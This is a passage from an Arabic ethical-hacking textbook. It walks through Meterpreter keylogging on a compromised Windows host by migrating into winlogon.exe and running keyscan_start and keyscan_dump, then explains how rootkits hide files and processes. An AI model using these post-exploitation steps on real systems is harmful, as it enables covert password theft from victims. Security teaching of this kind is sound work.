‫اﻟﺗﻌرﯾﻔﺎت اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ ﻛﻼ اﻟﺑﯾﺋﺗﯾن‪ ،‬وﺟﻠﺳﺔ اﻟﻌﻣل اﻟﻧﺷطﺔ اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ ﻣﻊ اﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻣن ﺧﻼل ‪ Meterpreter‬ﺗﻛون ﻣﻊ‬
‫)ﺳطﺢ اﻟﻣﻛﺗب( اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ل ‪) win logon‬ﻋﻣﻠﯾﺔ دﺧول( ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﺗﺳﺗﺧدم ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣﺧﺗﻠﻔﺔ‪ .‬ﻟذا إذا ﻛﺎﻧت ﺟﻠﺳﺔ اﻟﻌﻣل ﻣﻊ‬
‫ﺳطﺢ اﻟﻣﻛﺗب ﻓﻠن ﺗﺳﺗطﯾﻊ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ ﺑﻌﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬أو اﻟﻌﻛس ﺑﺎﻟﻌﻛس‪ .‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﻧﻘل ‪ Keyloggers‬اﻟﻰ‬
‫ﺟﻠﺳﺔ اﻟﻌﻣل اﻟﺗﻲ ﺗرﯾد ﻣراﻗﺑﺗﮭﺎ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺑﺑﺳﺎطﺔ ﺳوف ﻧﻘوم ﺑﻧﻘل طرﻓﯾﺔ ‪Meterpreter‬اﻟﻰ ﺑﯾﺋﺔ ‪ Winlogon‬ﺑدﻻ ﻣن ﺑﯾﺋﺔ ﺳطﺢ‬
‫اﻟﻣﻛﺗب ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ migrate‬ﺣﺗﻰ ﻧﺟد أﻧﻔﺳﻧﺎ ﻓﻲ اﻟوﺿﻊ اﻟﺻﺣﯾﺢ ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﺛم ﻧﺑدأ ‪ keyscan‬ﻣرة أﺧرى‪.‬‬
‫‪ .4‬ﻧﻘوم ﺑطﺑﺎﻋﺔ ‪ ps‬ﻓﻲ ﻗذﯾﻔﺔ‪/‬طرﻓﯾﺔ ‪ Meterpreter‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋم ﺑﺎﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﺗﻌﻣل اﻻن‪ .‬ﺛم ﻧﺑﺣث ﻟﻠﺣﺻول ﻋﻠﻰ ‪PID‬‬
‫اﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ ‪.Winlogon‬‬

‫ﺣﯾث ﻛﻣﺎ ﻧرى ﻣن اﻟﺻورة ھذه ان ‪ PID‬اﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ ‪ winlogon.exe‬ھﻲ ‪ 432‬ﻟذﻟك ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻧﻘل طرﻓﯾﺔ ‪Meterpreter‬‬
‫اﻟﻰ ﺟﻠﺳﺔ )‪ (session‬اﻟﻰ ھذا ال ‪.PID‬‬
‫‪ .5‬ﻧﻘوم ﺑطﺎﺑﻌﺔ اﻻﻣر ‪ migrate‬ﺛم ‪ PID‬ﺣﯾث ﻓﻲ ﺣﺎﻟﺗﻧﺎ ھذه ﺳوف ﯾﻛون ‪.migrate 432‬‬

‫ﻣﻠﺣوظﮫ إذا ﺣﺻﻠت ﻋﻠﻰ رﺳﺎﻟﺔ اﻟﺧطﺄ ‪ insufficient privileges‬ﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ رﻓﻊ ﺻﻼﺣﯾﺎﺗك اﻟﻰ ﺻﻼﺣﯾﺎت اﻟﻧظﺎم ‪system‬‬
‫‪.privileges‬‬
‫‪ .6‬اﻻن ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ keyscan_start‬ﺛم ﺑﻌد ذﻟك ‪.keyscan_dump‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪435‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام اﻻﺳﻛرﯾﺑت ‪ use post/windows/capture/lockout_keylogger‬ﻣن ﺧﻼل طرﻓﯾﺔ ‪ Meterpreter‬وذﻟك‬


‫ﻟﺗﺗﺑﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬

‫‪HIDING FILES 5.6‬‬

‫ﻣﺛل اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬ھﻧﺎك أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ )‪ (protective application‬اﻟﻘﺎدرة ﻋﻠﻰ ﻣﻧﻊ أو ﻛﺷف وﺣذف اﻟﺗطﺑﯾﻘﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب أن ﯾﺗم اﻛﺗﺷﺎف اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻣن ﻗﺑل اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ)‪ ، (protective application‬ﺣﯾث ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﺑﺈﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺑﯾﺛﺔ داﺧل ﻣﻠﻔﺎت ﻣﺷروع أﺧرى‪.‬‬

‫‪Rootkits‬‬

‫ﺗﻣﺎﻣﺎ ﻣﺛل‪ ، Metasploit‬ﻋﻧد ﯾﺗم اﻟﺗﻌﺎﻣل ﻷول ﻣره ﻟﻘوة وﻣﻛر ‪ ،Rootkits‬وﻋﺎدة ﻣﺎ ﯾﻛوﻧوا ﻣﻧدھﺷﯾن‪ .‬ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺑﺗدﺋﯾن‪Rootkits ،‬‬
‫ﯾظﮭر ﻟﮭم ﻋﻠﻰ اﻧﮫ ﯾﻣﻠك‪ ،‬ﺳﺣر أﺳود ﺗﻘرﯾﺑﺎ‪ .‬أﻧﮭﺎ ﻋﺎدة ﻣﺎ ﺗﻛون ﺑﺳﯾطﺔ ﻓﻲ ﻋﻣﻠﯾﺔ ﺗﺛﺑﯾﺗﮭﺎ وﯾﻣﻛن أن ﺗﻧﺗﺞ ﻧﺗﺎﺋﺞ ﻣذھﻠﺔ‪ .‬ﺗﺷﻐﯾل ‪Rootkits‬‬
‫ﯾﻣﻧﺣك اﻟﻘدرة ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻠﻔﺎت واﻟﻌﻣﻠﯾﺎت واﻟﺑراﻣﺞ ﻛﻣﺎ ﻟو ﻟم ﯾﻛوﻧوا أﺑدا ﻣﺛﺑﺗﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ Rootkits .‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء‬
‫اﻟﻣﻠﻔﺎت ﻋن اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬وﺣﺗﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ‪.‬‬
‫‪ Rootkits‬ھﻲ ﻓﻌﺎﻟﺔ ﺟدا ﻓﻲ إﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺈﻧﮭﺎ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون ﻧﺎﺟﺣﺔ ﻓﻲ اﻟﺗﮭرب ﺣﺗﻰ ﻣن ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻷﻛﺛر دﻗﮫ‪ .‬ﻋﺎدة ﻣﺎ‬
‫ﯾﻘﺎل إن اﺳم ‪ Rootkits‬ﯾﻛون ﻣﺷﺗﻖ ﻣن ﻛﻠﻣﺔ "‪ ،"root‬ﻛﻣﺎ ھو اﻟﺣﺎل ﻓﻲ اﻟﻣﺳﺗﺧدم اﻟﺟذري أو اﻟﻣﺳﺗﺧدم اﻹداري)‪، (root/admin access‬‬
‫و "‪ "kit‬واﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗم ﺗوﻓﯾرھﺎ ﻣن ﺧﻼل ﺣزﻣﺔ اﻟﺑراﻣﺞ‪.‬‬
‫ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ‪ Rootkits ،‬ﺗﻛون ﻣﺗﺧﻔﯾﮫ ﺗﻣﺎﻣﺎ )‪ .(stealthy‬ﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﻏراض ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺻﻌﯾد‬
‫اﻻﻣﺗﯾﺎزات‪ ،‬وﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﺗرﻛﯾب ‪ backdoors‬واﻟﻣﮭﺎم اﻟﺷرﯾرة اﻷﺧرى‪ .‬اﻟﻌدﯾد ﻣن ‪ Rootkits‬ﻗﺎدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف‬
‫ﻷﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى أدﻧﻰ ﺑﻛﺛﯾر ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ‪ ،‬أي داﺧل اﻟﻧواة‪/‬اﻟﻛﯾرﻧل‪ .‬اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ وظﺎﺋف اﻟﻣﺳﺗﺧدﻣﯾن ﻋﺎدة ﻓﻲ‬
‫ﺗﻛون ﻓﻲ ﻣﺳﺗوى أﻋﻠﻰ ﻣن اﻟﻧظﺎم‪ .‬ﻋﻧدﻣﺎ ﯾﺣﺗﺎج ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻷداء ﻣﮭﻣﺔ ﻣﻌﯾﻧﺔ‪ ،‬ﻓﺈﻧﮫ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻣرر‬
‫طﻠب إﻟﻰ ﻣﺳﺗوﯾﺎت أدﻧﻰ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻹﻛﻣﺎل اﻟﻣﮭﻣﺔ‪ .‬أذﻛر أن ﺑﻌض ‪ Rootkits‬ﯾﻌﯾش ﻓﻲ ﻋﻣﻖ ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﯾﻣﻛن أن ﺗﻌﻣل أﯾﺿﺎ "‬
‫‪ " hooking‬أو اﻋﺗراض ھذه اﻟﻧداءات اﻟﻣﺧﺗﻠﻔﺔ ﺑﯾن اﻟﺑرﻧﺎﻣﺞ وﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬
‫ﻣن ﺧﻼل اﺻطﯾﺎد اﻟطﻠب ﻣن ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت‪ ،‬ﻓﺎن ‪ Rootkits‬ﻗﺎدر ﻋﻠﻰ ﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺔ اﻟطﺑﯾﻌﯾﺔ‪ .‬اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪ :‬اﻓﺗرض‬
‫أﻧك ﺗرﯾد أن ﺗرى ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز‪ .‬ﻹﻧﺟﺎز ھذا‪ ،‬ﻓﺈن ﻣﻌظم اﻟﻣﺳﺗﺧدﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗرﻛﯾﺑﺔ اﻟﻣﻔﺎﺗﯾﺢ "‬
‫‪ .“ Ctrl + Alt + Del‬وھذا ﺳوف ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﺑدء ﻓﻲ إدارة اﻟﻣﮭﺎم وﻋرض اﻟﻌﻣﻠﯾﺎت واﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل‪ .‬ﻣﻌظم اﻟﻧﺎس ﺗﻘوم‬
‫ﺑﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻣن دون اﻟﺗﻔﻛﯾر ﻓﯾﮫ‪ .‬ﺣﯾث ﯾﻘوم ﺑﺎﻟﻧظر ﻓﻲ ﻗﺎﺋﻣﺔ ﻋرض اﻟﻌﻣﻠﯾﺔ ﺛم اﻟﻣﺿﻲ ﻗدﻣﺎ‪.‬‬
‫ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬اﻟﺑرﻧﺎﻣﺞ ھو إﺟراء ﻣﻛﺎﻟﻣﺔ إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﺳﺄل ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت أو اﻟﺧدﻣﺎت ﻗﯾد اﻟﺗﺷﻐﯾل‪ .‬ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﺳﺗﻌﻠم ﻋن ﺟﻣﯾﻊ‬
‫اﻟﺑراﻣﺞ ﻗﯾد اﻟﺗﺷﻐﯾل ﺛم إرﺟﺎع اﻟﻘﺎﺋﻣﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬إذا أﺿﻔﻧﺎ ‪ Rootkits‬ﻟﮭذا اﻟﻣزﯾﺞ‪ ،‬ﻓﺳوف ﺗﺻﺑﺢ اﻷﻣور أﻛﺛر ﺗﻌﻘﯾدا‪ .‬وذﻟك ﻷن‬
‫‪ Rootkits‬ﻟدﯾﮭﺎ اﻟﻘدرة ﻋﻠﻰ اﻋﺗراض وﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺎت ﻋﺎد ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬ﻋﻧدﻣﺎ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻋرض ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﯾﻣﻛن ﻟل‬
‫‪ Rootkits‬ﺑﺑﺳﺎطﺔ إزاﻟﺔ ﺑراﻣﺞ ﻣﺧﺗﺎرة‪ ،‬واﻟﺧدﻣﺎت‪ ،‬واﻟﻌﻣﻠﯾﺎت ﻣن اﻟﻘﺎﺋﻣﺔ‪ .‬ھذا ﯾﺣدث ﻋﻠﻰ اﻟﻔور واﻟﻣﺳﺗﺧدم ﻟﯾس ﻋﻠﻰ ﻋﻠم ﺑﺄي اﺧﺗﻼﻓﺎت‪.‬‬
‫اﻟﺑرﻧﺎﻣﺞ ﻧﻔﺳﮫ ھو ﻓﻲ اﻟواﻗﻊ ﯾﻌﻣل ﻋﻠﻰ ﻧﺣو ﻣﺛﺎﻟﻲ‪ .‬ﺣﯾث ﯾﻘدم ﺗﻘﺎرﯾر ﺑﺎﻟﺿﺑط ﻣﺎ ﻗﯾل ﻟﮫ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﻓﻲ ﻛﺛﯾر ﻣن اﻟﻣﻌﺎﻧﻲ‪ ،‬ﻓﺎن‬
‫‪ Rootkits‬ھو اﻟذي ﯾﺟﻌل ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﻛذب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪436‬‬

‫ﻣن اﻟﻣﮭم أن ﻧﺷﯾر إﻟﻰ أن ‪ Rootkits‬ﻟﯾﺳت ‪ Rootkits .exploit‬ھو اﻟﺷﻲء اﻟذى ﯾﺗم ﺗﺣﻣﯾﻠﮫ ﻋﻠﻰ اﻟﻧظﺎم ﺑﻌد أن ﯾﺗم ‪ exploit‬اﻟﻧظﺎم‪.‬‬
‫وﻋﺎدة ﻣﺎ ﺗﺳﺗﺧدم ‪ Rootkits‬ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت أو اﻟﺑراﻣﺞ واﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﻣﺳﺗﺗر اﻟﺧﻔﻲ‪.‬‬
‫‪ Rootkits‬ھﻲ ﺑراﻣﺞ ﺗﮭدف إﻟﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ‪ .‬ھذه ھﻲ اﻟﺑراﻣﺞ اﻟﺿﺎرة اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول‬
‫ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻷﻧﺷطﺔ اﻟﺧﺑﯾﺛﺔ‪ .‬أﯾﺿﺎ ﻣن أھداف ‪ Rootkits‬ھو اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات اﻟﻣﺳﺗﺧدم‬
‫اﻟﺟذري‪/‬اﻹداري )‪ (root/admin‬إﻟﻰ اﻟﻧظﺎم‪ .‬ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم اﻟﺟذري اﻟﻰ ھذا اﻟﻧظﺎم‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﻧﻔﯾذ أي‬
‫ﻣﮭﻣﺔ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو ﺣذف اﻟﻣﻠﻔﺎت‪ ،‬اﻟﺦ‪ .‬ﯾﻌﻣل ﻋن طرﯾﻖ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت‪ .‬ﺗﺗﺄﻟف ‪Rootkits‬‬
‫اﻟﻧﻣوذﺟﯾﺔ ﻣن ﺑراﻣﺞ ‪ ،backdoor‬وﺑراﻣﺞ ‪ ،DDOS‬ﺣزم ﺗﺟﺳس )‪ ،(Sniffing Packet‬وأدوات ‪ ،IRC bots ،log-wiping‬اﻟﺦ‪.‬‬
‫ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت ﺗﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن ‪ .attributes‬ھﻧﺎك ﺣﻘول ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﺳﻣﺎت اﻟﻣﻠف)‪ . (file attributes‬ﯾﺳﺗﺧدم اﻟﺣﻘل اﻷول‬
‫ﻟﺗﺣدﯾد ﺗﻧﺳﯾﻖ اﻟﻣﻠف)‪ ، (format of the file‬واﻟﺗﻲ ﻗد ﺗﻛون إﻣﺎ‪ ،archive ،hidden ،‬أو ‪ .read-only‬ﯾﺻف ﺣﻘل آﺧر اﻟﻣرة اﻟﺗﻲ ﺗم‬
‫إﻧﺷﺎء اﻟﻣﻠف ﻓﯾﮭﺎ‪ ،‬اﻟوﻗت اﻟذي ﺗم اﻟوﺻول اﻟﯾﮫ‪ ،‬طول اﻟﻣﻠف‪ .‬اﻟوظﯾﻔﺔ )(‪ GetFileAttributesEx‬و‬
‫)(‪ GetFilelnformationByHandle‬ﺗﺳﻣﺢ ﺑﮭذا‪.‬‬
‫ﯾﺳﺗﺧدم ‪ ATTRIB.exe‬ﻟﻌرض أو ﺗﻐﯾﯾر ﺳﻣﺎت اﻟﻣﻠف)‪ . (file attributes‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﺧﻔﺎء‪ ،‬أو ﺣﺗﻰ ﺗﻐﯾﯾر ﺳﻣﺎت ﻣﻠﻔﺎت اﻟﺿﺣﯾﺔ‪،‬‬
‫ﻟذﻟك ﯾﻣﻛن اﻟﻣﮭﺎﺟم اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬
‫ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑوﺿﻊ ‪ Rootkits‬ﺑﺎﺳﺗﺧدام اﻟطرق اﻷﺗﯾﺔ‪:‬‬
‫‪ -‬ﻓﺣص أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺿﻌﯾﻔﺔ واﻟﺧوادم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺗﻐﻠﯾف ‪ Rootkits‬ﻓﻲ ﻣﺟﻣوﻋﺔ ﺧﺎﺻﺔ ﻣن اﻟﺣزم ﻣﺛل اﻷﻟﻌﺎب‪.‬‬
‫‪ -‬ﺗﺛﺑﯾت ‪ Rootkits‬ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻌﺎﻣﺔ أو أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻟﻠﺷرﻛﺎت ﻣن ﺧﻼل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‪.‬‬
‫‪ -‬إطﻼق ھﺟوم ‪) zero-day‬ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‪ ،‬ﺗﺟﺎوز ﺳﻌﺔ اﻟﻣﺧزن اﻟﻣؤﻗت واﺳﺗﻐﻼل ﻧواة وﯾﻧدوز‪ ،‬اﻟﺦ(‪.‬‬
‫‪ -‬طرق اﻟراﺑط واﻟﺑوت ﻣن ‪ ،ICQ ،IRC‬اﻟﺦ‪(Means of a link and a bot from IRC, ICQ, etc) .‬‬
‫اﻟﻐرض اﻷﺳﺎﺳﻲ ﻣن ‪ Rootkits‬ھو اﻟﺳﻣﺎح ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﻟوﺻول اﻟﻣﺗﻌدد اﻟﻐﯾر ﻣﻧظم واﻟﻐﯾر ﻣﻛﺗﺷف إﻟﻰ اﻟﻧظﺎم‪ .‬ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺛﺑﯾت ﻋﻣﻠﯾﺔ‬
‫ﻣﺳﺗﺗرة أو اﺳﺗﺑدال واﺣد أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻓﻲ ﻋﻣﻠﯾﺎت اﻻﺗﺻﺎل اﻟﻌﺎدي‪.‬‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ‪ Rootkits‬ﻟﻸھداف اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟوﺻول اﻟﻰ اﻟﻧظﺎم اﻟﻣﺿﯾف ﻛﻣﺳﺗﺧدم ﺟذري واﻟوﺻول اﻟﻣﺳﺗﺗر ﻋن ﺑﻌد‪.‬‬
‫‪ -‬ﻟﺻﻧﻊ ﻗﻧﺎع ﻟﻣﺳﺎرات اﻟﻣﮭﺎﺟم واﻟﺗطﺑﯾﻘﺎت أو اﻟﻌﻣﻠﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫‪ -‬ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ‪ ،‬وﺣرﻛﺔ ﻣرور اﻟﺑﯾﺎﻧﺎت‪ ،‬وﻣﺎ إﻟﻰ ذﻟك ﻣن اﻟﻧظﺎم اﻟذي ﻗد ﯾﻛون ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣﻘﯾدة أو ﻻ ﯾﻣﻠﻛوا‬
‫اﻟوﺻول اﻟﯾﮭﺎ‪.‬‬
‫‪ -‬ﺗﺧزﯾن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى‪ ،‬وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ﯾﺣﺗوي ﻋﻠﻰ ﻣوارد ﺗﺳﺗﺧدم ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺗﺣدﯾﺛﺎت ﺑوت وھﻠم ﺟرا‪.‬‬

‫‪Types of Rootkits‬‬

‫‪ Rootkits‬ھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺧﻔﻲ ﻧﻔﺳﮭﺎ ﻋن ﺗطﺑﯾﻘﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻓﻲ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾوﻓر‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟوﺻول ﻟﻠﻣﺳﺗوى اﻟﺟذري إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺧﻼل ‪ .backdoor‬ھذه ‪ Rootkits‬ﺗوظف ﻣﺟﻣوﻋﺔ ﻣن اﻟﺗﻘﻧﯾﺎت‬
‫ﻟﻠﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻧوع ‪ Rootkits‬ﯾؤﺛر ﻋﻠﻰ اﺧﺗﯾﺎر ﻣوﺟﮫ اﻟﮭﺟوم‪ .‬أﺳﺎﺳﺎ ھﻧﺎك ﺳﺗﺔ أﻧواع ﻣن ‪ Rootkits‬اﻟﻣﺗﺎﺣﺔ‪ .‬وھم‪:‬‬
‫‪Hypervisor-level Rootkit‬‬

‫ﻣن اﻟﻣﻌروف ﻟﻠﺟﻣﯾﻊ اﻧﺗﺷﺎر ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ Virtualization‬ﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة ﻓﻲ ﺻورة ﺑراﻣﺞ ال ‪ Virtual Machine‬اﻟﻣﻧﺗﺷرة واﻟﺗﻲ‬
‫ﺗﻣﻛﻧﺎ ﻣن ﻋﻣل ﺟﮭﺎز وھﻣﻲ ﺑﻧظﺎم ﺗﺷﻐﯾل ﻣﻧﻔﺻل ﻋن اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ‪ .‬وﻣن أﺷﮭر ھذه اﻟﺑراﻣﺞ ھو ﺑرﻧﺎﻣﺞ ال‪ VMWare‬وﻏﯾرھﺎ‬
‫وﺗﺳﺗﺧدم طﺑﻌﺎ اﻷﻧظﻣﺔ اﻟوھﻣﯾﺔ ﻓﻲ ﺗﺣﻠﯾل اﻟﻔﯾروﺳﺎت واﻟروت ﻛﯾت وﻓﻲ اﺧﺗﺑﺎر اي ﺷﻲء ﺗرﯾد اﺧﺗﺑﺎره ﺑﻣﻌزل ﻋن ﺟﮭﺎزك وﺗﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ‬
‫ﺑﻧﺎء ﺧوادم ﻣﺗﻌددة اﻷﻧظﻣﺔ‪ Hypervisor-level rootkits .‬ﻋﺎدة ﻣﺎ ﯾﺗم إﻧﺷﺎؤھﺎ ﻣن ﺧﻼل اﺳﺗﻐﻼل ﻣﯾزة اﻷﺟﮭزة‬
‫)‪ (Exploiting hardware feature‬ﻣﺛل ‪ Intel VT‬و‪ Rootkits . AMD-V‬ھذه ﺗﺗﻌﺎﻣل ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﻠﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻋﻠﻰ أﻧﮫ‬
‫آﻟﺔ اﻓﺗراﺿﯾﺔ )‪ (virtual machine‬واﻟﺗﻲ ﺗﻣﻛﻧﮫ ﻣن اﻋﺗرض ﺟﻣﯾﻊ اﺳﺗدﻋﺎءات اﻷﺟﮭزة اﻟﺗﻲ أدﻟﻰ ﺑﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﮭدف‪ .‬ھذا اﻟﻧوع ﻣن‬
‫‪ Rootkits‬ﯾﻌﻣل ﻋن طرﯾﻖ ﺗﻌدﯾل ﺗﺳﻠﺳل ﺗﻣﮭﯾد‪/‬ﺗﺷﻐﯾل اﻟﻧظﺎم )‪ (The system's boot sequence‬ﺛم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل ﺑدﻻ ﻣن ﺷﺎﺷﺔ‬
‫اﻟﺟﮭﺎز اﻟوھﻣﻲ اﻷﺻﻠﻲ )‪.(original virtual machine‬‬
